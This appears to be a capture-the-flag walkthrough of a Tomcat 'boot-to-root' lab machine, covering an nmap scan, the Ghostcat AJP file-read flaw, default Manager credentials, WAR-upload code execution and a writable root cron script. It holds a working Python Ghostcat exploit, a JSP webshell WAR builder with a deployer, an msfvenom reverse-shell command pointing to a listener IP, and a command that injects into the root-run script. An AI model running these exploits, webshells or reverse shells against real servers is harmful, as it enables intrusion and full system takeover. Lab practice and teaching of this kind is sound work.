Just a simple boot-to-root box.

Let's start by navigating to the URL.

OK, I get an "unable to connect to the server" error. Let's run nmap and see what we can find.

Nmap scan report for 10.10.203.251
Host is up (0.17s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
1272/tcp filtered cspmlockmgr
5904/tcp filtered unknown
8009/tcp open ajp13
8080/tcp open http-proxy
8649/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 96.05 seconds

Attempting to connect to port 8080, I get an SSL timeout error. Removing the https:// from the start of the URL fixes this (oops!): the service on 8080 is plain HTTP, so a TLS handshake against it hangs.

A little research shows that /manager/html is the Tomcat Manager application, which prompts for HTTP basic auth credentials.

Let's see if there are any other vulnerabilities for Apache Tomcat 8.5.5. There's a Python script that may work for RCE. I tried it, but it did not work.

OK, let's take a step back and look at some of the other ports. I have never seen AJP before. AJP (Apache JServ Protocol) is a binary protocol that lets a front-end proxy such as Apache httpd hand requests to the application server with the headers in a compact binary encoding; Tomcat listens for it on 8009/tcp by default, which is exactly the port nmap found.

Doing some research, there seems to be a vulnerability called Ghostcat (CVE-2020-1938) in this protocol: the AJP connector trusts request attributes supplied by the client, which lets anyone who can reach port 8009 read any file under a web application's directory (and, if they can also upload a file there, include it as JSP for code execution).

OK, I watched a John Hammond video on the Ghostcat vulnerability and found an AJP shooter (AJPShooter) that works. I can read files off of the site. Now we just need to find the installation directory.
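What a tool like AJPShooter does under the hood, as an added example (this is not the tool's code and not part of the original walkthrough): it builds a raw AJP13 FORWARD_REQUEST whose javax.servlet.include.* attributes point Tomcat's DefaultServlet at a file under the webapp root, sends it to port 8009, and collects the SEND_BODY_CHUNK packets from the reply. The target host, the Host header value and the file path are assumptions.

```python
"""Ghostcat-style file read over raw AJP13 (CVE-2020-1938).
Added example; not AJPShooter's code. Target host/port and file are assumptions."""
import socket
import struct

AJP_PORT = 8009  # Tomcat's default AJP connector port (8009/tcp in the nmap output)


def ajp_string(s):
    """AJP string: 2-byte big-endian length, the bytes, then a NUL terminator."""
    data = s.encode()
    return struct.pack(">H", len(data)) + data + b"\x00"


def ajp_attribute(name, value):
    """req_attribute (code 0x0A): a name/value pair the connector copies straight
    into the servlet request. Trusting these from the client is the bug."""
    return b"\x0a" + ajp_string(name) + ajp_string(value)


def build_ghostcat_request(target_file, server_name="localhost"):
    """Build an AJP13 FORWARD_REQUEST for GET / whose include attributes make the
    DefaultServlet serve `target_file` (a path relative to the webapp root)."""
    body = (
        b"\x02"                          # prefix code: FORWARD_REQUEST
        + b"\x02"                        # method: GET
        + ajp_string("HTTP/1.1")         # protocol
        + ajp_string("/")                # req_uri
        + ajp_string("127.0.0.1")        # remote_addr (assumed value)
        + ajp_string("localhost")        # remote_host (assumed value)
        + ajp_string(server_name)        # server_name
        + struct.pack(">H", 8080)        # server_port
        + b"\x00"                        # is_ssl: false
        + struct.pack(">H", 1)           # num_headers
        + ajp_string("Host") + ajp_string(server_name)
        + ajp_attribute("javax.servlet.include.request_uri", "/")
        + ajp_attribute("javax.servlet.include.path_info", target_file)
        + ajp_attribute("javax.servlet.include.servlet_path", "/")
        + b"\xff"                        # request terminator
    )
    # Client-to-server packets start with magic 0x12 0x34 and a 2-byte length.
    return b"\x12\x34" + struct.pack(">H", len(body)) + body


def parse_ajp_response(data):
    """Walk server-to-client packets (magic 'AB'): concatenate SEND_BODY_CHUNK (3)
    payloads and stop at END_RESPONSE (5); SEND_HEADERS (4) is skipped."""
    body = b""
    pos = 0
    while pos + 4 <= len(data):
        if data[pos:pos + 2] != b"AB":
            raise ValueError("bad AJP magic at offset %d" % pos)
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        packet = data[pos + 4:pos + 4 + length]
        pos += 4 + length
        if packet[0] == 3:
            chunk_len = struct.unpack(">H", packet[1:3])[0]
            body += packet[3:3 + chunk_len]
        elif packet[0] == 5:
            break
    return body


def read_file(host, target_file, port=AJP_PORT, timeout=5):
    """Send the crafted request and return the included file's bytes."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_ghostcat_request(target_file))
        # END_RESPONSE is the 6-byte packet AB 00 02 05 <reuse flag>.
        while not (len(data) >= 6 and data[-6:-1] == b"AB\x00\x02\x05"):
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    return parse_ajp_response(data)


if __name__ == "__main__":
    # Assumed target; WEB-INF/web.xml is the usual first file to pull.
    print(read_file("10.10.203.251", "WEB-INF/web.xml").decode(errors="replace"))
```

The path you pass is resolved inside the web application that owns the request URI (the ROOT webapp for "/"), so WEB-INF/web.xml and anything else deployed with the app come back, but /etc/passwd or the Tomcat installation directory do not; that limit is worth knowing before spending time hunting with it.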

Couldn't find anything! Turns out I went down a rabbit hole: Ghostcat only reaches files under the web application's own directory (WEB-INF/web.xml and the like), not the rest of the filesystem, so it will never find the installation directory. After I looked at a hint, let's go back to the manager login and try the default creds.

Remember folks, ALWAYS TRY THE DEFAULT CREDS: https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

Ha ha, wow, look, I'm in.

There are a few different endpoints here, including the ability to upload files and directories. There is a WAR file upload, which is the classic way to get code execution from the Tomcat Manager: anything deployed as a WAR runs as the Tomcat user. Let's see if we can exploit that.

https://null-byte.wonderhowto.com/how-to/hack-apache-tomcat-via-malicious-war-file-upload-0202593/

I tried to use Metasploit, but it did not work. Let's try to do it manually.

msfvenom -p java/shell_reverse_tcp lhost=10.6.10.177 lport=9999 -f war -o pwn.war

With a listener on port 9999 (nc -lvnp 9999), the WAR deployed through the manager and the new application requested, a shell comes back. That worked! Time to upgrade the shell: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
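The same WAR-upload technique done by hand, as an added example that is not part of the original walkthrough: instead of msfvenom's reverse shell it packs a small JSP command shell into a WAR (a zip with WEB-INF/web.xml and the JSP at its root), deploys it with a PUT to the Manager's text interface, and then calls the JSP with a command. The text interface needs the manager-script role, which the default tomcat-users.xml examples grant alongside manager-gui; the base URL, credentials, context path and JSP name below are assumptions.

```python
"""Hand-built WAR with a JSP command shell, deployed via /manager/text/deploy.
Added example, not the box author's or Tomcat's code. URL/creds/paths are assumed."""
import base64
import io
import urllib.parse
import urllib.request
import zipfile

# Minimal JSP webshell: GET /<ctx>/cmd.jsp?cmd=id runs the command and returns stdout.
CMD_JSP = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>
"""

# An empty deployment descriptor is enough; Tomcat serves the JSP by filename.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
</web-app>
"""


def build_war(jsp_source=CMD_JSP, jsp_name="cmd.jsp"):
    """Return WAR bytes: a zip holding WEB-INF/web.xml and the JSP at the root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """Sorted member names of a WAR, for checking what we built."""
    return sorted(zipfile.ZipFile(io.BytesIO(war_bytes)).namelist())


def deploy_war(base_url, user, password, context_path, war_bytes):
    """PUT the WAR to the Manager text interface; returns the Manager's reply.
    Scripting /manager/text avoids the CSRF nonce the HTML upload form requires."""
    query = urllib.parse.urlencode({"path": context_path, "update": "true"})
    req = urllib.request.Request(f"{base_url}/manager/text/deploy?{query}",
                                 data=war_bytes, method="PUT")
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode()


def run_cmd(base_url, context_path, jsp_name, cmd):
    """Call the deployed JSP and return the command's output."""
    query = urllib.parse.urlencode({"cmd": cmd})
    url = f"{base_url}{context_path}/{jsp_name}?{query}"
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    # Assumed target and credentials: use whatever the default-creds list got you in with.
    base = "http://10.10.203.251:8080"
    user, password = "MANAGER_USER", "MANAGER_PASSWORD"
    print(deploy_war(base, user, password, "/pwn", build_war()))
    print(run_cmd(base, "/pwn", "cmd.jsp", "id"))
```

Undeploy with a GET to /manager/text/undeploy?path=/pwn when done, and remember that everything the JSP runs is executed as the Tomcat service account, which is why the next step is privilege escalation.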

Nice, now we can read user.txt. Let's try to escalate privileges or move laterally. There is an interesting script, id.sh, that runs periodically as root and dumps its output into a text file, test.txt, and our user can write to it.

So, a normal human being would use a text editor to edit the file. But here we use echo. Append the following command so that, the next time the script runs as root, it copies /root/root.txt into test.txt.

echo -e 'echo -e $(cat /root/root.txt >> test.txt)' >> id.sh

Yes, that is two echos: the single quotes keep the outer echo from expanding anything, so it writes the inner line verbatim into id.sh, and when root runs the script the $(...) substitution runs cat with its output redirected into test.txt (relative to whatever directory the script runs from). But it works! So after 2 hours and multiple wrong paths we have finished the box!
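The general form of this privilege escalation is "a root cron job runs a script we can write to", so the check a practitioner wants is a scan of the system crontab for commands whose absolute paths are writable by the current user. This is an added example (not from the original walkthrough); the crontab text it ships with is constructed, and the script paths in it are made up, since the page never says where id.sh lives.

```python
"""Find cron jobs (system crontab format: schedule, user, command) whose script
or output paths the current user can write to. Added example; SAMPLE_CRONTAB is
constructed and its paths are hypothetical."""
import os
import re

# Either an @keyword or five schedule fields, then the user, then the command.
CRON_LINE = re.compile(r"^\s*(@\w+\s+|(?:\S+\s+){5})(\S+)\s+(.*)$")

SAMPLE_CRONTAB = """\
# constructed /etc/crontab for illustration
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root /opt/scripts/id.sh
*/5 * * * * root /usr/bin/python3 /opt/backup.py >> /var/log/backup.log
@reboot root /usr/local/bin/setup.sh
"""


def cron_commands(crontab_text):
    """Yield (user, command) for each job line; skip comments and VAR=value lines."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if m:
            yield m.group(2), m.group(3)


def script_paths(command):
    """Absolute paths mentioned in a command: the script itself, its arguments,
    and redirect targets, since an appended-to log file can matter too."""
    return [tok for tok in re.split(r"[\s;&|]+", command) if tok.startswith("/")]


def writable_cron_targets(crontab_text, is_writable=lambda p: os.access(p, os.W_OK)):
    """Return [(user, path)] for every absolute path in a job we could modify.
    `is_writable` is injectable so the logic can be exercised without real files."""
    hits = []
    for user, command in cron_commands(crontab_text):
        for path in script_paths(command):
            if is_writable(path):
                hits.append((user, path))
    return hits


if __name__ == "__main__":
    try:
        with open("/etc/crontab") as fh:
            text = fh.read()
    except OSError:
        text = SAMPLE_CRONTAB  # fall back to the constructed sample
    for user, path in writable_cron_targets(text):
        print(f"{user} runs {path} and we can write to it")
```

Writable does not only mean the script file: a writable directory on the cron PATH, or a relative command name, gives the same result, and jobs in /etc/cron.d and the per-user crontabs (crontab -l) should be checked the same way.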

Thank you for following along with this ADHD guide.